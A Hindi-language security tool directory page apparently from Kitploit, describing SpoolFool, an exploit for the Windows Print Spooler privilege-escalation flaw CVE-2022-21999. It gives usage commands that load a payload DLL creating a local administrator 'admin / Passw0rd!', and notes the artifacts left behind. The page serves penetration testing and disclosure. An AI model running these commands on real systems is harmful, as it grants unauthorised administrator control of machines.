Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
SpoolFool — CVE-2022-21999 के लिए एक्सप्लॉइट - Windows Print Spooler विशेषाधिकार उन्नयन भेद्यता (LPE) | Kitploit
उपकरण/GitHubGitHub/ly4k/spoolfool
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगबाइनरी शोषण
GitHubly4k/spoolfool

SpoolFool

CVE-2022-21999 के लिए एक्सप्लॉइट - Windows Print Spooler विशेषाधिकार उन्नयन भेद्यता (LPE)

रिपॉजिटरी देखें
7961604 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

SpoolFool

CVE-2022-21999 के लिए एक्सप्लॉइट - Windows प्रिंट स्पूलर विशेषाधिकार उन्नयन भेद्यता (LPE)

विवरण

दिया गया एक्सप्लॉइट डिफ़ॉल्ट रूप से सभी Windows डेस्कटॉप संस्करणों पर काम करना चाहिए।

पूर्ण तकनीकी विवरण के लिए कृपया ब्लॉग पोस्ट देखें यहाँ।

उपयोग

root@kitploit:~
PS C:\SpoolFool> .\SpoolFool.exe

SpoolFool
  By Oliver Lyak (@ly4k_)

Examples:
  C:\SpoolFool\SpoolFool.exe -dll add_user.dll
  C:\SpoolFool\SpoolFool.exe -dll add_user.dll -printer 'My Printer'
  C:\SpoolFool\SpoolFool.exe -dll add_user.dll -dir 'SECRET'
  C:\SpoolFool\SpoolFool.exe -dll add_user.dll -printer 'My Printer' -dir 'SECRET'

Powershell

root@kitploit:~
PS C:\SpoolFool> ipmo .\SpoolFool.ps1
PS C:\SpoolFool> Invoke-SpoolFool

SpoolFool
  By Oliver Lyak (@ly4k_)

Examples:
   -dll add_user.dll
   -dll add_user.dll -printer 'My Printer'
   -dll add_user.dll -dir 'SECRET'
   -dll add_user.dll -printer 'My Printer' -dir 'SECRET'

अवधारणा का प्रमाण

निम्नलिखित PoC एक DLL का उपयोग करता है जो एक नया स्थानीय व्यवस्थापक admin / Passw0rd! बनाता है। DLL (AddUser.dll) और स्रोत कोड इस रिपॉजिटरी में पाए जा सकते हैं।

दूसरा रन

निम्नलिखित PoC प्रदान किए गए एक्सप्लॉइट के दूसरे रन को प्रदर्शित करता है। ध्यान दें कि DLL लोड करने के लिए इस बार भेद्यता का शोषण नहीं किया गया है।

आर्टिफैक्ट्स

एक्सप्लॉइट निष्पादित होने के बाद, बाद में सफाई के लिए निम्नलिखित आर्टिफैक्ट छोड़े जाएंगे:

  • निर्मित प्रिंटर ड्राइवर निर्देशिका हटाई नहीं जाती है
  • पेलोड DLL को प्रिंटर ड्राइवर निर्देशिका में कॉपी किया जाता है और इसे हटाया नहीं जाता है
  • कोई भी निर्मित प्रिंटर हटाया नहीं जाता है
  • लक्षित प्रिंटर का SpoolDirectory मान पुनर्स्थापित नहीं किया जाता है

लेखक

  • Oliver Lyak @ly4k_

संदर्भ

  • SpoolFool: Windows प्रिंट स्पूलर विशेषाधिकार वृद्धि (CVE-2022-21999)
टूल डाउनलोड करें